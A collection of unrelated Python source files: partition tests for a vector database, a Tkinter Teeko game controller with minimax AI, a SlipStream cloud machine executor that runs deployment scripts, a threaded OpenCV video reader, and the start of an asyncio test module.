par_wrap.init_partition(collection, name, check_task="check_nothing")
collection_w = self.init_collection_wrap()
for _ in range(threads_num):
t = threading.Thread(target=create_partition, args=(collection_w.collection, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
p_name = cf.gen_unique_str()
self.partition_wrap.init_partition(
collection_w.collection, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "maximum partition's number should be limit to 4096"})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("partition_name", [ct.default_partition_name])
def test_partition_drop_default_partition(self, partition_name):
"""
target: verify drop the _default partition
method: 1. drop the _default partition
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
default_partition, _ = collection_w.partition(ct.default_partition_name)
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert default_partition.name == partition_w.name
# verify that drop partition with error
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "default partition cannot be deleted"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_drop_partition_twice(self, partition_name):
"""
target: verify drop the same partition twice
method: 1.create a partition with default schema
2. drop the partition
3. drop the same partition again
expected: raise exception when 2nd time
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
collection_w.has_partition(partition_name)
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
# verify that drop the partition again with exception
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition not exist"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_create_and_drop_multi_times(self, partition_name):
"""
target: verify create and drop a partition multiple times
method: 1.create a partition with default schema
2. drop the partition
3. repeat steps #1 and #2 several times
expected: create and drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# range for 5 times
for i in range(5):
# create partition and check that the partition exists
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop partition and check that the partition not exists
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
# @pytest.mark.parametrize("flush", [True, False])
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_drop_non_empty_partition(self, partition_name):
"""
target: verify drop a partition which has data inserted
method: 1.create a partition with default schema
2. insert some data
3. flush / not flush
3. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data())
# # flush remove flush for issue #5837
# if flush:
# self._connect().flush([collection_w.name])
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
# @pytest.mark.parametrize("flush", [True, False])
@pytest.mark.parametrize("partition_name, data", [(cf.gen_unique_str(prefix), cf.gen_default_list_data(nb=10))])
@pytest.mark.parametrize("index_param", cf.gen_simple_index())
def test_partition_drop_indexed_partition(self, partition_name, data, index_param):
"""
target: verify drop an indexed partition
method: 1.create a partition
2. insert same data
3. create an index
4. flush or not flush (remove flush step for issue # 5837)
5. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
partition_w.insert(data)
# create index of collection
collection_w.create_index(ct.default_float_vec_field_name, index_param)
# # flush
# if flush:
# self._connect().flush([collection_w.name])
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_empty_partition(self):
"""
target: verify release an empty partition
method: 1.create a partition
2. release the partition
expected: release successfully
"""
# create partition
partition_w = self.init_partition_wrap()
assert partition_w.is_empty
# release partition
partition_w.release()
# TODO: assert no more memory consumed
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_dropped_partition(self):
"""
target: verify release a dropped partition
method: 1. create a partition
2. drop the partition
3. release the partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# release the dropped partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition not exist"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_release_dropped_collection(self, partition_name):
"""
target: verify release a partition whose collection has been dropped
method: 1. create a collection and partition
2. drop the collection
3. release the partition
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# release the partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, search_vectors",
[(cf.gen_unique_str(prefix), cf.gen_vectors(1, ct.default_dim))])
def test_partition_release_after_collection_released(self, partition_name, search_vectors):
"""
target: verify release a partition after the collection released
method: 1. create a collection and partition
2. insert some data
3. release the collection
4. release the partition
expected: partition released successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
data = cf.gen_default_list_data()
partition_w.insert(data)
assert partition_w.num_entities == len(data[0])
assert collection_w.num_entities == len(data[0])
# load partition
partition_w.load()
# search of partition
res_1, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res_1) == 1
# release collection
collection_w.release()
# search of partition
res_2, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 0,
ct.err_msg: "not loaded into memory"})
# release partition
partition_w.release()
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, data", [(ct.default_partition_name, cf.gen_default_dataframe_data())])
def test_partition_insert_default_partition(self, partition_name, data):
"""
target: verify insert data into _default partition
method: 1.create a collection
2. insert some data into _default partition
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
assert collection_w.has_partition(partition_name)[0]
partition_w = self.init_partition_wrap(collection_w, partition_name)
# insert data to partition
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == len(data)
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_dropped_partition(self):
"""
target: verify insert data into dropped partition
method: 1.create a collection
2. insert some data into dropped partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition not exist"})
# TODO: update the assert error
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_insert_dropped_collection(self, partition_name):
"""
target: verify insert data into dropped collection
method: 1.create a collection
2. insert some data into dropped collection
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "None Type"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_maximum_size_data(self, data):
"""
target: verify insert maximum size data (256M?) at a time
method: 1.create a partition
2. insert maximum size data
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w)
# insert data to partition
max_size = 100000 # TODO: clarify the max size of data
partition_w.insert(cf.gen_default_dataframe_data(max_size))
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == max_size
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dim", [ct.default_dim - 1, ct.default_dim + 1])
def test_partition_insert_mismatched_dimensions(self, dim):
"""
target: verify insert data with mismatched dimensions
method: 1. create a collection with default dim
2. insert data with a mismatched dim
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
data = cf.gen_default_list_data(nb=10, dim=dim)
# insert data to partition
partition_w.insert(data, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "but entities field dim"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("sync", [True, False])
def test_partition_insert_sync(self, sync):
"""
target: verify insert sync
method: 1.create a partition
2. insert data in sync
expected: insert successfully
"""
pass
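# A possible shape for the sync-insert case above (sketch only; whether the
# wrapper's insert() accepts a sync keyword depends on the wrapper/pymilvus
# version in use):
#
#   collection_w = self.init_collection_wrap()
#   partition_w = self.init_partition_wrap(collection_w)
#   partition_w.insert(cf.gen_default_list_data(), sync=sync)
#   assert partition_w.num_entities > 0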
|
Controleur.py
|
# -*- coding: utf-8 -*-
from VueJeu import *
from Model import *
from random import randint
import MinMax
import AlphaBeta
import threading
import os
class Controleur:
""" Classe qui gère le passage du menu au jeu et qui gère les différentes actions (clic)
- root : fenêtre principal de l'application
- frame : frame contenant les éléments graphiques
- choix1 / choix2 : contient le type de joueur sélectionner (0 -> joueur, 1 -> IA)
- model : contient les informations a propos de la partie en cours
- vueJeu : contient l'interface graphique de la partie en cours
"""
enable_click = True
def __init__(self):
self.root = Tk()
self.root.title("Teeko")
self.root.resizable(0, 0)
self.root.geometry("500x500")
self.frame = Frame(self.root, width=500, height=550, borderwidth=1)
self.creation_barre_menu()
self.creation_menu()
self.root.mainloop()
def creation_menu(self):
self.frame.pack(fill=BOTH)
self.choix_1 = IntVar()
self.choix_2 = IntVar()
self.label_1 = Label(self.frame, text="Niveau IA 1 : ")
self.label_2 = Label(self.frame, text="Niveau IA 2 : ")
self.lb_1 = Listbox(self.frame, height=len(
parameters.tabLevels), selectmode=SINGLE, exportselection=0)
self.lb_2 = Listbox(self.frame, height=len(
parameters.tabLevels), selectmode=SINGLE, exportselection=0)
choix_joueur1 = Radiobutton(
self.frame, text="Joueur", variable=self.choix_1, value=0)
choix_ia1 = Radiobutton(self.frame, text="IA",
variable=self.choix_1, value=1)
choix_joueur1.pack()
choix_ia1.pack()
self.label_1.pack()
for i in range(1, len(parameters.tabLevels) + 1):
self.lb_1.insert(END, i)
self.lb_1.pack()
choix_joueur2 = Radiobutton(
self.frame, text="Joueur", variable=self.choix_2, value=0)
choix_ia2 = Radiobutton(self.frame, text="IA",
variable=self.choix_2, value=1)
choix_joueur2.pack()
choix_ia2.pack()
self.label_2.pack()
for i in range(1, len(parameters.tabLevels) + 1):
self.lb_2.insert(END, i)
self.lb_2.pack()
bouton_jouer = Button(self.frame, text="Jouer",
command=self.lancement_jeu)
bouton_jouer.pack()
def action_on_mouse_event(self, event):
if not self.model.get_gagnant() and self.enable_click:
x = event.x - 60
y = event.y - 60
if x > 0 and y > 0:
x = int(x / 82)
y = int(y / 82)
if x < 5 and y < 5:
if self.model.action(x, y):
# Display the current player's move
self.vue_jeu.affichage()
# If it is the AI's turn to play
if self.model.tour == self.model.joueur1 == self.model.TYPE_IA or (self.model.tour == 2 and self.model.joueur2 == self.model.TYPE_IA):
# Disable user clicks while the AI is playing
self.enable_click = False
if parameters.elagage:
functarget = AlphaBeta.min_max
else:
functarget = MinMax.min_max
pMax = self.model.pMax_ias[self.model.tour]
eval_enable = self.model.eval_ias[self.model.tour]
# Run the AI computation in a thread
t = threading.Thread(
target=functarget, args=(self.model, pMax, eval_enable))
t.start()
# Wait for the AI to play...
t.join()
self.vue_jeu.affichage()
self.enable_click = True
if self.model.get_gagnant():
self.affiche_gagnant()
def ia_vs_ia(self):
# Place a first pawn at random
x = randint(0, 4)
y = randint(0, 4)
self.model.pose_pion(x, y)
# Keep playing while there is no winner
while not self.model.gagnant:
if parameters.elagage:
functarget = AlphaBeta.min_max
else:
functarget = MinMax.min_max
pMax = self.model.pMax_ias[self.model.tour]
eval_enable = self.model.eval_ias[self.model.tour]
# Run the AI computation in a thread
t = threading.Thread(
target=functarget, args=(self.model, pMax, eval_enable))
t.start()
# Wait for the AI to play...
t.join()
self.vue_jeu.affichage()
def affiche_gagnant(self):
self.fenetre_gagnant = Tk()
self.fenetre_gagnant.title('Fin partie')
self.fenetre_gagnant.geometry("200x100")
champ_label = Label(self.fenetre_gagnant, text="Le joueur n°" +
str(self.model.get_tour()) + " a gagné !")
champ_label.pack()
self.fenetre_gagnant.mainloop()
def relance_menu(self):
for widget in self.frame.winfo_children():
widget.destroy()
self.creation_menu()
def lancement_jeu(self):
selection_level_ia_1 = self.lb_1.curselection()
selection_level_ia_2 = self.lb_2.curselection()
# Check whether one of the players is an AI
# and whether a level has been selected for it
ready = True
if self.choix_1.get() == 1 and not selection_level_ia_1:
ready = False
if self.choix_2.get() == 1 and not selection_level_ia_2:
ready = False
# If there is an AI and its level is selected
if ready:
# Create the model
self.model = Model(self.choix_1.get(), self.choix_2.get())
# Get the level of each AI (if at least one player is of type AI)
# set pMax and the eval boolean
if self.choix_1.get() == 1:
self.model.pMax_ias[1] = parameters.tabLevels[self.lb_1.get(
ACTIVE) - 1][1]
self.model.eval_ias[1] = parameters.tabLevels[self.lb_1.get(
ACTIVE) - 1][2]
if self.choix_2.get() == 1:
self.model.pMax_ias[2] = parameters.tabLevels[self.lb_2.get(
ACTIVE) - 1][1]
self.model.eval_ias[2] = parameters.tabLevels[self.lb_2.get(
ACTIVE) - 1][2]
# If the match is AI vs AI, launch the game in a console
if self.model.joueur1 == self.model.joueur2 == self.model.TYPE_IA:
dir_path = os.path.dirname(os.path.realpath(__file__))
# os.path.join(dir_path, 'VueConsole.py')
pMax_1 = str(
parameters.tabLevels[self.lb_1.get(ACTIVE) - 1][1])
eval_1 = str(
parameters.tabLevels[self.lb_1.get(ACTIVE) - 1][2])
pMax_2 = str(
parameters.tabLevels[self.lb_2.get(ACTIVE) - 1][1])
eval_2 = str(
parameters.tabLevels[self.lb_2.get(ACTIVE) - 1][2])
os.system('start /B start cmd.exe @cmd /k python ' +
os.path.join(dir_path, "VueConsole.py") + " " + pMax_1 + " " + eval_1 + " " + pMax_2 + " " + eval_2)
# Remove the displayed menu
for widget in self.frame.winfo_children():
widget.destroy()
# Otherwise, launch the game GUI
else:
# Remove the displayed menu
for widget in self.frame.winfo_children():
widget.destroy()
self.vue_jeu = VueJeu(self.model, self.frame,
self.action_on_mouse_event)
self.vue_jeu.update_status_label()
def creation_barre_menu(self):
menubar = Menu(self.root)
self.root.config(menu=menubar)
menubar.add_command(label="Rejouer", command=self.relance_menu)
|
MachineExecutor.py
|
"""
SlipStream Client
=====
Copyright (C) 2014 SixSq Sarl (sixsq.com)
=====
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import re
import sys
import time
import errno
import codecs
import traceback
import tarfile
import tempfile
import random
from Queue import Queue, Empty
from threading import Thread
from slipstream.ConfigHolder import ConfigHolder
from slipstream.exceptions.Exceptions import AbortException, TerminalStateException, ExecutionException
from slipstream.NodeDecorator import NodeDecorator
from slipstream import util
class MachineExecutor(object):
WAIT_NEXT_STATE_SHORT = 15
WAIT_NEXT_STATE_LONG = 60
EMPTY_STATE_RETRIES_NUM = 4
# Wait interval (seconds) between server calls when executing a target script.
TARGET_POLL_INTERVAL = 30
SCRIPT_EXIT_SUCCESS = 0
def __init__(self, wrapper, config_holder=ConfigHolder()):
"""
:param wrapper: SlipStream client and cloud client wrapper
:type wrapper: slipstream.wrappers.CloudWrapper
:param config_holder: configuration holder
:type config_holder: slipstream.ConfigHolder
"""
self.wrapper = wrapper
self.timeout = 55 * 60 # 55 minutes
self.ssLogDir = util.get_platform_reports_dir()
self.verboseLevel = 0
config_holder.assign(self)
self.reportFilesAndDirsList = [self.ssLogDir]
self.node_instance = self._retrieve_my_node_instance()
self.recovery_mode = False
self._send_reports = False
def execute(self):
try:
self._execute()
except Exception as ex:
self._fail_global(ex)
def _execute(self):
state = self._get_state()
while True:
self._execute_state(state)
self._complete_state(state)
state = self._wait_for_next_state(state)
def _get_state(self):
state = self.wrapper.getState()
if state:
return state
else:
for stime in self._get_state_retry_sleep_times():
util.printDetail('WARNING: Got no state. Retrying after %s sec.' % stime)
self._sleep(stime)
state = self.wrapper.getState()
if state:
return state
raise ExecutionException('ERROR: Machine executor: Got no state from server.')
def _get_state_retry_sleep_times(self):
return [1] + random.sample(range(1, self.EMPTY_STATE_RETRIES_NUM + 2),
self.EMPTY_STATE_RETRIES_NUM)
def _execute_state(self, state):
if not state:
raise ExecutionException('ERROR: Machine executor: No state to execute '
'specified.')
try:
self._set_state_start_time()
method_name = 'on' + state
if hasattr(self, method_name):
getattr(self, method_name)()
else:
self._state_not_implemented(state)
except AbortException as ex:
util.printError('Abort flag raised: %s' % ex)
except TerminalStateException:
return
except KeyboardInterrupt:
raise
except (SystemExit, Exception) as ex:
if isinstance(ex, SystemExit) and str(ex).startswith('Terminating on signal'):
self._log_and_set_statecustom('Machine executor is stopping with: %s' % ex)
else:
util.printError('Error executing node, with detail: %s' % ex)
traceback.print_exc()
self._fail(ex)
self.onSendingReports()
def _state_not_implemented(self, state):
msg = "Machine executor does not implement '%s' state." % state
traceback.print_exc()
self._fail_str(msg)
self.onSendingReports()
def _complete_state(self, state):
if self._need_to_complete(state):
self.wrapper.complete_state()
@staticmethod
def _failure_msg_from_exception(exception):
"""
:param exception: exception instance
:return: string
"""
return "Exception %s with detail: %s" % (exception.__class__, str(exception))
def _fail(self, exception):
self.wrapper.fail(self._failure_msg_from_exception(exception))
def _fail_global(self, exception):
self.wrapper.fail_global(self._failure_msg_from_exception(exception))
def _fail_str(self, msg):
self.wrapper.fail(msg)
def _wait_for_next_state(self, state):
"""Returns the next state after waiting (polling is used) for the state
transition from the server.
"""
util.printDetail('Waiting for the next state transition, currently in %s' % state,
self.verboseLevel, util.VERBOSE_LEVEL_NORMAL)
while True:
new_state = self._get_state()
if state != new_state:
return new_state
self._sleep(self._get_sleep_time(state))
def _in_ready_and_no_need_to_stop_images(self, state):
return state == 'Ready' and not self.wrapper.need_to_stop_images()
def _in_ready_and_mutable_run(self, state):
return state == 'Ready' and self._is_mutable()
@staticmethod
def _sleep(seconds):
util.sleep(seconds)
def _get_sleep_time(self, state):
if not self._is_mutable() and self._in_ready_and_no_need_to_stop_images(state):
return self.WAIT_NEXT_STATE_LONG
return self.WAIT_NEXT_STATE_SHORT
def _retrieve_my_node_instance(self):
node_instance = self.wrapper.get_my_node_instance()
if node_instance is None:
raise ExecutionException("Couldn't get the node instance for the current VM.")
return node_instance
def _get_recovery_mode(self):
self.recovery_mode = self.wrapper.get_recovery_mode()
def _is_recovery_mode(self):
return self.recovery_mode == True
def _is_mutable(self):
return self.wrapper.is_mutable()
def _need_to_complete(self, state):
return state not in ['Finalizing', 'Done', 'Cancelled', 'Aborted']
def _set_need_to_send_reports(self):
self._send_reports = True
def _execute_execute_target(self):
self._execute_target('execute', abort_on_err=True)
self._set_need_to_send_reports()
def _execute_target(self, target_name, exports=None, abort_on_err=False, ssdisplay=True, ignore_abort=False):
target = self.node_instance.get_image_target(target_name)
display_target_name = {
'prerecipe': 'Pre-install',
'recipe': 'Post-install',
'execute': 'Deployment',
'report': 'Reporting',
'onvmadd': 'On VM Add',
'onvmremove': 'On VM Remove'
}.get(target_name, target_name)
if target is None:
util.printAndFlush('Nothing to do for script: %s' % display_target_name)
return
for subtarget in target:
full_target_name = '%s:%s' % (subtarget.get('module_uri'), display_target_name)
if target_name in [NodeDecorator.NODE_PRERECIPE, NodeDecorator.NODE_RECIPE] \
and not self._need_to_execute_build_step(target, subtarget):
util.printAndFlush('Component already built. Nothing to do on target: %s' % full_target_name)
continue
script = subtarget.get('script')
if script:
message = "Executing script '%s'" % full_target_name
util.printStep(message)
if ssdisplay:
self.wrapper.set_statecustom(message)
fail_msg = "Failed running '%s' script on '%s'" % (full_target_name, self._get_node_instance_name())
self._launch_script(script, exports, abort_on_err, ignore_abort, fail_msg, full_target_name)
else:
util.printAndFlush('Nothing to do for script: %s' % full_target_name)
def _need_to_execute_build_step(self, target, subtarget):
return MachineExecutor.need_to_execute_build_step(self._get_node_instance(), target, subtarget)
@staticmethod
def need_to_execute_build_step(node_instance, target, subtarget):
module_uri = subtarget.get('module_uri')
build_states = node_instance.get_build_state()
cloud = node_instance.get_cloud()
for st in reversed(target):
st_module_uri = st.get('module_uri')
build_state = build_states.get(st_module_uri, {})
if cloud in build_state.get('built_on', []):
return False
if st_module_uri == module_uri:
return True
return True
def is_image_built(self):
node_instance = self._get_node_instance()
module_uri = node_instance.get_image_resource_uri()
build_state = node_instance.get_build_state().get(module_uri, {})
cloud = node_instance.get_cloud()
return cloud in build_state.get('built_on', [])
def _get_script_name(self, name):
return name if name is not None else NodeDecorator.DEFAULT_SCRIPT_NAME
def _launch_script(self, script, exports=None, abort_on_err=True, ignore_abort=False, fail_msg=None, name=None):
_name = self._get_script_name(name)
if fail_msg is None:
fail_msg = "Failed running script '%s' on '%s'" % (_name, self._get_node_instance_name())
try:
rc, stderr_last_line = self._run_target_script(script, exports, ignore_abort=ignore_abort, name=name)
sys.stdout.flush()
sys.stderr.flush()
except Exception as ex:
msg = '%s: %s' % (fail_msg, str(ex))
if abort_on_err:
self.wrapper.fail(msg)
raise
else:
if rc != self.SCRIPT_EXIT_SUCCESS and abort_on_err:
if stderr_last_line is not None:
fail_msg += ': %s' % stderr_last_line
self.wrapper.fail(fail_msg)
raise AbortException(fail_msg)
def _run_target_script(self, target_script, exports=None, ignore_abort=False, name=None):
'''Return exit code of the user script and the last line of stderr
Output of the script goes to stdout/err and will end up in the node executor's log file.
'''
_name = self._get_script_name(name)
if not target_script:
util.printAndFlush('Script "%s" is empty\n' % (_name,))
            return self.SCRIPT_EXIT_SUCCESS, None  # keep the (rc, stderr_last_line) return shape
if not isinstance(target_script, basestring):
raise ExecutionException('Not a string buffer provided as target for script "%s". Type is: %s'
% (_name, type(target_script)))
process = self._launch_process(target_script, exports, name)
result = Queue()
t = Thread(target=self.print_and_keep_last_stderr, args=(process.stderr, result))
t.daemon = True # thread dies with the program
t.start()
try:
# The process is still working on the background.
while process.poll() is None:
# Ask server whether the abort flag is set. If so, kill the
# process and exit. Otherwise, sleep for some time.
if not ignore_abort and self.wrapper.isAbort():
try:
util.printDetail('Abort flag detected. '
'Terminating execution of script "%s"...' % (_name,))
process.terminate()
util.sleep(5)
if process.poll() is None:
util.printDetail('Termination is taking too long. '
'Killing the script "%s"...' % (_name,))
process.kill()
except OSError:
pass
break
util.sleep(self.TARGET_POLL_INTERVAL)
except IOError as e:
if e.errno != errno.EINTR:
raise
else:
util.printDetail('Signal EINTR detected. Ignoring it.')
                return 0, None  # keep the (rc, stderr_last_line) return shape
util.printDetail("End of the script '%s'" % (_name,))
stderr_last_line = ''
try:
stderr_last_line = result.get(timeout=60)
except Empty:
pass
return process.returncode, stderr_last_line
def _write_target_script_to_file(self, target_script, name=None):
file_suffix = ''
if util.is_windows():
file_suffix = '.ps1'
directory = None
try:
directory = util.get_state_storage_dir()
except Exception as e:
util.printError('Creating script storage directory failed with: "%s"' % (e,))
if name is None or directory is None:
fn = tempfile.mktemp(suffix=file_suffix, dir=directory)
else:
filename = re.sub(r'[^0-9a-z._-]', '', name.replace('/', '_').replace(' ', '-').replace(':', '__').lower())
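            # e.g. a hypothetical name 'Module/Uri Recipe:main' becomes 'module_uri-recipe__main'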
if file_suffix:
filename += file_suffix
fn = os.path.join(directory, filename)
if isinstance(target_script, unicode):
with codecs.open(fn, 'w', 'utf8') as fh:
fh.write(target_script)
else:
with open(fn, 'w') as fh:
fh.write(target_script)
os.chmod(fn, 0755)
return fn
def _launch_process(self, target_script, exports=None, name=None):
'''Returns launched process as subprocess.Popen instance.
'''
try:
fn = self._write_target_script_to_file(target_script, name)
except Exception as e:
util.printError('Writing script "%s" to file failed with: "%s". Retrying with random filename.' % (name, e))
fn = self._write_target_script_to_file(target_script)
current_dir = os.getcwd()
new_dir = util.get_temporary_storage_dir()
os.chdir(new_dir)
if 'HOME' not in os.environ:
if exports is None:
exports = {}
exports['HOME'] = os.path.expanduser('~')
try:
process = util.execute(fn, noWait=True, extra_env=exports, withStderr=True)
finally:
os.chdir(current_dir)
return process
def print_and_keep_last_stderr(self, stderr, result):
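        """Mirror the child's stderr to our own stderr and, once the stream is
        exhausted, push the last non-empty line (None if there was none) onto
        the `result` queue."""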
last_line = None
for line in iter(stderr.readline, b''):
sys.stderr.write(line)
if line.strip():
last_line = line.strip()
result.put(last_line)
def onInitializing(self):
util.printAction('Initializing')
def onProvisioning(self):
util.printAction('Provisioning')
self._clean_user_info_cache()
self._clean_local_cache()
def _clean_user_info_cache(self):
self.wrapper.discard_user_info_locally()
def _clean_local_cache(self):
self.wrapper.clean_local_cache()
def onExecuting(self):
util.printAction('Executing')
def onSendingReports(self):
util.printAction('Sending reports')
reportFileName = '%s_report_%s.tgz' % (
self._get_node_instance_name(), util.toTimeInIso8601NoColon(time.time()))
reportFileName = os.path.join(tempfile.gettempdir(), reportFileName)
try:
archive = tarfile.open(reportFileName, 'w:gz')
for element in self.reportFilesAndDirsList:
name = '_'.join(os.path.abspath(element).strip(os.sep).split(os.sep))
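                # e.g. on POSIX, the hypothetical path '/var/log/messages' becomes the member name 'var_log_messages'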
archive.add(os.path.expandvars(element), name)
except Exception as e:
raise RuntimeError("Failed to bundle reports:\n%s" % e)
archive.close()
self.wrapper.send_report(reportFileName)
def onReady(self):
util.printAction('Ready')
def onFinalizing(self):
util.printAction('Finalizing')
if self.wrapper.isAbort():
util.printError("Failed")
else:
util.printAction('Done!')
def onDone(self):
self._abort_running_in_final_state()
def onCancelled(self):
self._abort_running_in_final_state()
def onAborted(self):
self._abort_running_in_final_state()
def _abort_running_in_final_state(self):
time.sleep(60)
        raise ExecutionException('The run is in a final state but the VM is still running!')
def get_cloud_service_name(self):
return self.wrapper._get_cloud_service_name()
def _get_node_instance(self):
return self.wrapper.get_my_node_instance()
def _get_node_instance_name(self):
return self.wrapper.get_my_node_instance_name()
def _killItself(self, is_build_image=False):
self.wrapper.stopOrchestrator(is_build_image)
def _set_state_start_time(self):
self.wrapper.set_state_start_time()
def _log_and_set_statecustom(self, msg):
self.wrapper._log_and_set_statecustom(msg)
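
# --- Illustrative sketch (not part of the original module) ----------------
# A minimal, self-contained example of the polling pattern used by
# MachineExecutor._wait_for_next_state above: keep asking a state source for
# the current state and sleep between polls until the state changes.  The
# FakeStateSource below is a stand-in invented for this sketch; the real
# executor queries the server through self.wrapper instead.
if __name__ == '__main__':
    import itertools
    import time as _time

    class FakeStateSource(object):
        """Cycles through a few states, repeating each one a couple of times."""
        def __init__(self):
            self._states = itertools.chain.from_iterable(
                [s] * 3 for s in ['Provisioning', 'Executing', 'Ready'])

        def get_state(self):
            return next(self._states, 'Done')

    def wait_for_next_state(source, state, poll_interval=0.1):
        # Poll until the reported state differs from the one we are in.
        while True:
            new_state = source.get_state()
            if new_state != state:
                return new_state
            _time.sleep(poll_interval)

    src = FakeStateSource()
    current = src.get_state()
    while current != 'Done':
        print('currently in %s' % current)
        current = wait_for_next_state(src, current)
    print('reached final state: Done')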
|
VideoStream.py
|
from threading import Thread
import sys
import cv2
from queue import Queue
# This class reads video frames in a separate thread and keeps only the
# latest frame in its queue, ready to be grabbed by another thread.
class VideoStream(object):
def __init__(self, path, queueSize=15):
self.stream = cv2.VideoCapture(path)
self.stopped = False
self.Q = Queue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
try:
while True:
if self.stopped:
return
if not self.Q.full():
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
self.Q.put(frame)
                    # Clean the queue to keep only the latest frame
while self.Q.qsize() > 1:
self.Q.get()
except Exception as e:
print("got error: "+str(e))
def read(self):
return self.Q.get()
def more(self):
return self.Q.qsize() > 0
def stop(self):
self.stopped = True
def __exit__(self, exception_type, exception_value, traceback):
self.stream.release()
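
# --- Illustrative usage (not part of the original class) ------------------
# A minimal sketch of how VideoStream is meant to be driven: start the
# background reader, then poll more()/read() from the consumer thread.
# The video path below is hypothetical; replace it with a real file or a
# camera index such as 0.
if __name__ == '__main__':
    import time

    vs = VideoStream('example_video.mp4').start()
    while vs.more() or not vs.stopped:
        if not vs.more():
            time.sleep(0.01)  # reader thread has not produced a frame yet
            continue
        frame = vs.read()
        cv2.imshow('VideoStream preview', frame)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    vs.stop()
    cv2.destroyAllWindows()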
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
